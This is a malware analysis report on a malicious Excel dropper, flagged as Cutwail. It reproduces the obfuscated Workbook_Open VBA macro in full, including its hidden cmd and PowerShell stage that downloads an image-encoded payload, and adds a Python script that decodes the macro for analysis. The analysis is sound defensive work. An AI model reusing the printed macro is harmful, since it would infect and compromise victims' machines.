Verdict: MALICIOUS (risk score 260)

Malware insights

MITRE ATT&CK: T1059.005 (Command and Scripting Interpreter: Visual Basic), T1566.001 (Phishing: Spearphishing Attachment)
This Excel document carries a `Workbook_Open` VBA macro that calls `Shell()` with window style `6 - 1 - 5` = 0 (vbHide) on a command assembled from four string-returning functions (`SpaceExtender`, `Attmemo`, `HelpCon`, `Office31`). The assembled command is a `cmd /V:ON /C` one-liner: it stores a long string in the variable `8O`, reverses it character by character with `for /L %X in (3029,-1,0)`, and executes the result through `cmd /C !Swkc:~6!`. Read backwards, the stored string contains `SET kGn=POWeRshell -wInDoWST H -nOP -nOl -eXEcutIOn BYPASs -NONI ...`, an `ieX` alias built from `$verbOsEPrEFErENcE.tOStRiNG()[1,3]+'X'`, format-operator (`-f`) and `.rEpLaCE()` string reassembly, `$ExecutionContext.InvokeCommand.InvokeScript` over an environment variable, and a trailing `CmD.EXe/c%kGn%`: a hidden-window PowerShell stage launched by a second cmd.exe. The fragments readable in that PowerShell (`Add-Type -AssemblyName System.Drawing`, `Net.WebClient`, `GetPixel`, `foreach($x in (0..499))`, `((...B -band 15)*16) -bor (...G -band 15)`) match the Invoke-PSImage decoder, which downloads an image and rebuilds a payload from the low nibbles of its pixel colour channels. The final payload is therefore not visible in the macro source; the structure is that of a dropper, and the PowerShell stage most likely downloads and runs a second-stage payload.
Heuristics (6)

- ClamAV: Xls.Dropper.Cutwail-6737961-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Xls.Dropper.Cutwail-6737961-0
- VBA macros detected [medium, OLE_VBA_MACROS, 4 related findings]: Document contains VBA macro code
- Shell() call in VBA [critical, OLE_VBA_SHELL]: Shell() call in VBA
- Workbook_Open macro [high, OLE_VBA_WBOPEN]: Workbook_Open macro
- cmd.exe reference in VBA [high, OLE_VBA_CMD]: cmd.exe reference in VBA
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4510 bytes | fc964a4b5247b67d83d9560bdef11faeece07370c6ce22a1c4c007bce06095b8 |
Preview (first 1,000 lines of the extracted script, reproduced as carved):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Function SpaceExtender()
SpaceExtender = "cmd /V:ON/C""set 8O=%nGk%c/eXE.DmC ^&^&) ""\eU`Lav""\.) )'vne','sXL:' f- ""\}0{}1{""\( )'tEg','tIdLIHc-','Me' f-""\}0{}1{}2{""\ (. ( (ekovnI.) 't','pirCS','eKovNI'f- ""\}2{}1{}0{""\(.""\DnA`M`MoC`EKOvNi""\.""\EulA`V""\.))'av','tX','Etno','cNo','ITuCExe:elBAiR' f- ""\}3{}2{}1{}0{}4{""\ ( )'sL'(. ( INON- sSAPYB nOItucEXe- lOn- POn- H TSWoDnIw- llehsReWOP=nGk TES^&^&)''nIOj-'X'+]3,1[)(GNiRtSOt.EcNEreFErPEsObrev$ (^&^^ ^|^^)93]rAhC[]gnIRTs[,'z43'(ECaLper.)69]rAhC[]gnIRTs[,'DLm'(ECaLper.)43]rAhC[]gnIRTs[,'WKE'(ECaLper.)'^|^^',)05]rAhC[+99]rAhC[+211]rAhC[((ECaLper.)'$',)98]rAhC[+77]rAhC[+65]rAhC[((ECaLper.)'))]1501..0[}O{YM8(WKEgNiRTDLmsDLmTeGW'+'KE.WKEiIDLmCsAWKE::}klDLm530o{YM8 ()z43XEz43,z43Iz43f- WKE'+'}1{}0{WKE(^&^^;}}))51 dnab- WKEGWKE.}P{YM8(rob-)61*)51dnab-WKEBWKE.}P{YM8((WKEekDLmOvniWKE.))z43olFz43,z43oz43'+' f- WKE}0'+'{}1{WKE(,z43rz43f- WKE}0{}1'+'{WKE(::WKEEuLADLmvWKE.))z43hz43+z43ieXz43( )z43Ez43,z'+'43Vz43,)z43lBz43,z43a'+'z43'+',z43Airz43f-"
End Function
Sub Workbook_Open()
AccentCalculation
End Sub
Function Attmemo()
Attmemo = " WKE}2{}0{}1{WKE( f-WKE}2{}0{}1{W'+'KE(. ( (=]}X{YM8+005*}_{YM8[}O{YM8;)}_{YM8,}X{YM8(WKEeKoVDLmnIWKE.))z43teGz43,z43Pz43 f-'+'WKE}'+'0{}1{WKE(,z43lexz43,z43iz43f-WKE}1{}0{}2{WKE('+'.}G{YM8=}P{YM8{))994..0(ni }x{YM8(hcaerof{)z43%z43(.2cp)'+'2..0(;0051 ))z43[z43,)z43yBz4'+'3,z43etz43f'+'-WKE}0{}1{WKE(f-WKE}1{}0{WKE(,z43]z43 f-WKE}0{}1{WKE( )z43xxz43(.=}O{YM8;))))'+'z43iz43,)z43rugz43,z43oc.z43 f-WKE}0{}1{WKE(,z43m'+'z43 f- W'+'KE}1{}0{}2{WKE(,z43hz43,)z43NFz43,)z439z43,))z4333Sz43,z43.z43 f-WKE}'+'0{}1{WKE(,z43npz43 f- WKE}0{}1{WKE( f-WKE}0{}1{WKE(,z43oz43 f-WKE}1{'+'}0{}2{WKE(,z4'+'3gz43,z43mz43,z43.iz43,z43/z43,))z43sptz43,z43tz43 f- WKE}1{}0{WKE(,z43/:z43,z43/z43 f-WKE}0{}1{}2{WKE(f- WKE}4{}5{}1{}3{}7{}2{}0{}6{WKE((WKEEKOVNDLmiWKE.)z43pOz4'+'3,))z43ez43,)z43az43,z43eRnz43 f- WKE}1{}0{WKE(f- WKE}0{}1{WKE(,z43dz43 f-WKE}0{}1{WKE( f- WKE}0{}1{WKE(.)))z'+'43Nz43,z43.tez43f-'+' WKE}0{}1{WKE(,)z43lCz43,z43bez43f-WKE}1{}0{WKE(,z43Wz43,)z43neiz43,z43tz43 f-WKE}0{"
End Function
Function HelpCon()
HelpCon = "}1{WKE( f- WKE}0{}2{}1{}3{WKE( )z43xxz43(^&^^(()z43ez43,)z43'+'tz43,z43sySz43 f- WKE}1{}0{WKE(,z43mz4'+'3'+',)z43.z43,))z43Bz43,z4'+'3.gnz43f- WKE}1{}'+'0{WKE(,z43tiz43f- WKE}0{}'+'1{W'+'KE(,)z43iwz43,z43arDz43f- WKE'+'}1{}0'+'{WKE( f-WKE}1{}0{}2{WKE(,z43pamz43f-WKE}0{}1{}2{}4{}3{WKE( )z43xxz43(.=}G{YM8;)z43gnz43,z43iz43,z43Sz43,)z43etz43,)z43wz43,)z43rDz43,z43.mz43 f-WKE}1{}0{WKE(,z43az43f-WKE}2{}0{}1{W'+'KE(,z43syz43 f- WKE}1{}2{}0{WKE('+' f-WKE}3{}2{}0{}1{WK'+'E( emaNylbmessA- ))z43T-dz43,z43dAz43f-WKE}1{}0{WKE(,z43yz43,z43epz43 f- WKE}0{}1{}2{WKE(.;)z43tcez43,z43eNz43,)z43jz43,)z43-wz43,z4'+'3bOz43 f-WKE}0{}1{WKE('+'f-WKE}1{}0{WKE(f- WKE}2{}0{}1{W'+'K'+'E( )z43xxz43( )z43asz43,z43lz43f- WKE}0{}1{WKE(. ; )z43et.z43,z43metz43,z43.txz'+'43,)z43GNiz43,z43DOz43,z43CnEz43 f-WKE}2{}1{}0{WKE(,z43SYsz43F- WKE}1{}2{}4{}3{}0{WKE(]EPyt[ = '+' }KL'+'53DLm0o{YM8;) )z43HtAz43,z43mz43f- WKE}1{}0{WKE('+']EpYt[ ( )))z43Lz43,)z43EX:z43,z43ez43f- WK"
End Function
Function Office31()
Office31 = "E}1{}0{WKE(f- WKE}0{}1{WKE(,z43HIz43 f-WKE}0{}1{WKE(+WKEBWKE+WKEAIWKE+WKERaVWKE( )z43Mz43,z43teSz43,)z43i-z43,z43Etz43 f-WKE}0{}'+'1{WKE( f-WKE}2{}0{}1{WKE(^&^^'+' '( =sXl TEs&&for /L %X in (3029,-1,0)do set Swkc=!Swkc!!8O:~%X,1!&&if %X equ 0 cmd /C !Swkc:~6!"""
End Function
Private Function cellandtable()
cellandtable = SpaceExtender + Attmemo + HelpCon & Office31
End Function
Sub AccentCalculation()
Call Shell(cellandtable, 6 - 1 - 5)
End Sub
Attribute VB_Name = "Foglio1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_Predeclared
... (truncated)
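The one-liner above is a mechanical transform, so it can be undone mechanically rather than by reading 3,000 characters backwards. The script below is an added example, not part of the analyzer's report or of the sample: it rebuilds the VBA string concatenation (a doubled `""` inside a VBA literal is one `"`), walks the `cmd /V:ON` one-liner with cmd's quote and caret rules to recover what `set 8O=` stores, replays the `for /L %X in (N,-1,0)` loop with the bound the stub declares, and drops the `!Swkc:~SKIP!` prefix. The VBA it decodes when run without arguments is constructed for the demo (the `DEMO_HIDDEN` command, the `JUNK01` pad and the `make_demo_macro` encoder are assumptions, built in the same layout as the carved macro); give it the path of the carved `macros.bas` to decode the real sample.

```python
"""Replay the cmd /V:ON string-reversal stub built by the macro.

Added example (not the analyzer's or the sample's code). Without arguments it
decodes a constructed demo macro; with a path it decodes that VBA source.
"""
import re
import sys

LITERAL_RE = re.compile(r'^\s*(\w+)\s*=\s*"((?:[^"\n]|"")*)"\s*$', re.M)
CONCAT_RE = re.compile(r'^\s*\w+\s*=\s*(\w+(?:\s*[+&]\s*\w+)+)\s*$', re.M)
# for /L %X in (BOUND,-1,0)do set ACC=!ACC!!VAR:~%X,1!&& ... !ACC:~SKIP!
STUB_RE = re.compile(
    r'for /L %(\w+) in \((\d+),-1,0\)\s*do set (\w+)=!\3!!(\w+):~%\1,1!'
    r'.*?!\3:~(\d+)!', re.I | re.S)


def vba_string_concat(src):
    """Join the string-literal functions named in the `a = b + c & d` line."""
    lits = {m.group(1): m.group(2).replace('""', '"') for m in LITERAL_RE.finditer(src)}
    for m in CONCAT_RE.finditer(src):
        names = re.split(r'\s*[+&]\s*', m.group(1))
        if all(n in lits for n in names):
            return ''.join(lits[n] for n in names)
    raise ValueError('no concatenation of string literals found')


def cmd_set_value(cmdline, var):
    """What `set VAR=` stores: outside quotes ^ escapes the next char and an
    unescaped & | < > ends the value; quotes are kept and toggle quote mode.
    %name% references are left alone (undefined ones stay literal at the prompt)."""
    m = re.search(r'set\s+' + re.escape(var) + '=', cmdline, re.I)
    if not m:
        raise ValueError('no set %s= in command line' % var)
    out, quoted, i = [], False, m.end()
    while i < len(cmdline):
        ch = cmdline[i]
        if ch == '"':
            quoted = not quoted
        elif not quoted and ch == '^':
            i += 1
            ch = cmdline[i] if i < len(cmdline) else ''
        elif not quoted and ch in '&|<>':
            break
        out.append(ch)
        i += 1
    return ''.join(out)


def replay_reversal(stored, bound, skip):
    """The loop appends stored[bound], ..., stored[0]; an index past the end
    yields an empty substring, so a bound above the length is harmless, while
    a bound below it silently drops the start of the reversed command."""
    acc = ''.join(stored[i] for i in range(bound, -1, -1) if i < len(stored))
    return acc[skip:]


def decode_macro(vba_source):
    """VBA source -> command line the last `cmd /C !ACC:~SKIP!` executes."""
    stub = vba_string_concat(vba_source)
    m = STUB_RE.search(stub)
    if not m:
        raise ValueError('no for /L reversal stub in the concatenated string')
    _loop_var, bound, _acc, var, skip = m.groups()
    return replay_reversal(cmd_set_value(stub, var), int(bound), int(skip))


def cmd_escape(value):
    """Caret-escape a set value the way the stub does: only outside quotes."""
    out, quoted = [], False
    for ch in value:
        if ch == '"':
            quoted = not quoted
        elif ch in '&|<>^' and not quoted:
            out.append('^')
        out.append(ch)
    return ''.join(out)


def make_demo_macro(hidden, skip=6, pad='JUNK01'):
    """Constructed VBA in the layout of the carved macro (demo input only):
    pad + hidden is reversed, caret-escaped and split over four functions."""
    if len(pad) != skip:
        raise ValueError('pad length must equal the :~SKIP offset')
    stored = (pad + hidden)[::-1]
    stub = ('cmd /V:ON/C"set 8O=' + cmd_escape(stored)
            + '&&for /L %X in (' + str(len(stored) - 1) + ',-1,0)do set Swkc=!Swkc!!8O:~%X,1!'
            + '&&if %X equ 0 cmd /C !Swkc:~' + str(skip) + '!"')
    q, names = len(stub) // 4, ['SpaceExtender', 'Attmemo', 'HelpCon', 'Office31']
    parts = [stub[:q], stub[q:2 * q], stub[2 * q:3 * q], stub[3 * q:]]
    funcs = ''.join('Function %s()\n%s = "%s"\nEnd Function\n'
                    % (n, n, p.replace('"', '""')) for n, p in zip(names, parts))
    return (funcs + 'Private Function cellandtable()\n'
            'cellandtable = SpaceExtender + Attmemo + HelpCon & Office31\nEnd Function\n'
            'Sub AccentCalculation()\nCall Shell(cellandtable, 6 - 1 - 5)\nEnd Sub\n')


# Constructed stand-in for the real hidden command (same shape: SET of a
# PowerShell line, then cmd.exe /c expanding it); not the sample's own text.
DEMO_HIDDEN = ('SET kGn=POWeRshell -NONI -wInDoWST H -eXEcutIOn BYPASs'
               ' -c "Get-Date | Out-Null"&&CmD.EXe/c%kGn%')
DEMO_MACRO = make_demo_macro(DEMO_HIDDEN)

if __name__ == '__main__':
    src = open(sys.argv[1], errors='replace').read() if len(sys.argv) > 1 else DEMO_MACRO
    print(decode_macro(src))
```

The decoded text should itself read as a command line (a `SET ...&&...` chain, as the reversed fragments in the preview show). The replay uses exactly the bound and skip the stub declares, so if they disagree with the stored length the output is shifted by the difference; that mismatch is worth recording in the report rather than "fixing" silently. `%kGn%`-style references are left unexpanded because at the cmd prompt an undefined variable stays literal and is only expanded by the next cmd.exe the chain spawns.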